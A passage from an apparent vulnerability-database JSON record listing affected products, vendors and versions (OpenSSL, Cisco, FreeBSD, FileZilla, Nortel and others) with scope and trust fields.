            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "hardware management console for pseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "stonebeat fullcluster for gauntlet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1050"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "networks meridian option 51c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10.0"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3x86"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.6.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "server 0.8.6a",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "-release-p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.1"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "aironet acs350 c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3502.6"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.3"
          },
          {
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "firewalll",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(3)"
          },
          {
            "model": "hardware management console for iseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0"
          },
          {
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "call manager sr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.2.0.1"
          },
          {
            "model": "call manager sr2b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.0.201"
          },
          {
            "model": "hardware management console for iseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "call manager es07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "95000"
          },
          {
            "model": "hardware management console for pseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.2"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "7.0"
          },
          {
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6000"
          },
          {
            "model": "networks cs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(0)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(0)"
          },
          {
            "model": "ons ios-based blades",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15454"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.5"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.7"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76550"
          },
          {
            "model": "hardware management console for iseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.2"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.5.0"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.17"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.3"
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.5"
          },
          {
            "model": "financials server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "navision",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.1"
          },
          {
            "model": "fuji",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1.1"
          },
          {
            "model": "hardware management console for pseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.4"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "intuity lx",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "linux personal oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.4"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.x"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(1)"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0(2)"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.1.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.1"
          },
          {
            "model": "access registrar",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "networks meridian option 81c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.2"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1"
          },
          {
            "model": "linux openexchange server",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7.1"
          },
          {
            "model": "hardware management console for iseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.4"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(3)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "server 0.9.4d",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.42"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "grid engine update7 1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.4"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5.2"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "call manager es40",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.19"
          },
          {
            "model": "call manager es50",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.2"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3(3.33)"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.6"
          },
          {
            "model": "secure acs for windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ids",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2700"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1740"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1010"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3(5)"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.659"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.1"
          },
          {
            "model": "networks communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.4"
          },
          {
            "model": "converged communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0.0x64"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.22"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.2"
          },
          {
            "model": "hardware management console for iseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "grid engine update1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.5"
          },
          {
            "model": "s8500 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.50.3.45"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.4"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-45000"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44900"
          },
          {
            "model": "s8700 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.2"
          },
          {
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "project openssl beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "call manager es56",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.0"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.3"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0x86"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.11"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-46000"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40003.1.59.24"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.12"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "17500"
          },
          {
            "model": "hardware management console for iseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.5"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0"
          },
          {
            "model": "personal",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "unitedlinux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "hat network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3)4.2"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.1"
          },
          {
            "model": "predictive dialer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ftp server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.3.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(2)"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.2"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.0"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "20003.1.59.24"
          },
          {
            "model": "-release-p20",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "grid engine update2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "model": "appliance server",
            "scope": "eq",
            "trust": 0.3,
